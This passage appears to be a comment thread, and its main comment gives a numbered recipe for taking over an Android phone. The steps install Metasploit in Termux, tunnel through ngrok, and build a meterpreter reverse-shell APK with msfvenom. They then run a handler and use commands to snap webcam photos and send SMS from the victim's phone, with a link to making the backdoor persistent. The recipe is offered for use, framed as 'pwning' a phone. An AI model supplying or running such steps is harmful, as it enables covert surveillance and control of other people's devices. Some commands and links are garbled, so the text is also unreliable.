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acid klown

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  1. I already requested my response to be withdrawn. I dont support terrorism.
  2. Hi Benny! ^_^ Nice to meet you. I am a big Hak5 fan, myself. Shout out to Kitchen and the team! I am interested in the same topic, and spent a lot of time this week making it all real. Here is a summary of what I did to pwn my Android phone via my other Android phone: 1) Download Termux on Google play store. 2) pkg install wget, pkg install curl, pkg install python, pkg install git, pkg install ssh 3) git clone https://github.com/rapid7/metasploit-framework 4) CD metasploit-framework 5) bundle install (takes about 5 minutes) 6) Go to https://dashboard.ngrok.com/user/signup And register a port forwarding free. 7) git clone https://github.com/inconshreveable/ngrok 8)CD ngrok 9)./ngrok tokenauth (your ngrok token) one time dealio 10) ping o.tcp.ngrok.io (get the ngrok IP address) 11) ./ngrok tcp 4564 12)open new windows session Slide thumb to the right. Offers termux new session. In new session, CD metasploit framework. 13) ./msfvenom -p android/meterpreter/reverse_tcp LHOST= (STEP 11) LPORT=(Step 10, ngrok random port) R> /sdcard/lolz.apk This creates payliad on Root directory in Android phone. 14) ./msfconsole 15) msf> use exploit /multi/handler msf> set payload android/meterpreter/reverse_tcp msf> set LHOST localhost msf> set lport 4564 msf> exploit -j -z 16) run lolz.apk payload on other phone. Ngrok waiting for session. Mad waiting for session. Bvoila! Once it connects, Type sessions -i 1 and see meterpreter. Type help for commands. Type command -h for help with a command. webcam_snap -i 2 -p /sdcard/selfy.jpg send_sms -d 2149711234 -t "what's up Darren :)" commands here https://gist.github.com/mataprasad/c5dd39154a852cdc67ff7958e0a82699 You can make the connection persistent only as long as they are not rebooted. To make persistent shell, see this article: https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ Manz, your good to pwn. I also recommend, Git clone https:///github.com/RajkumrdusadTool-X 200 kali tools for termux!! I love this pr09. Please note: Ngrok port randomly changes, so your payload must co-align. I haven't used evil Droid so maybe you know. ? - คςเ๔ кɭ๏ฬภ
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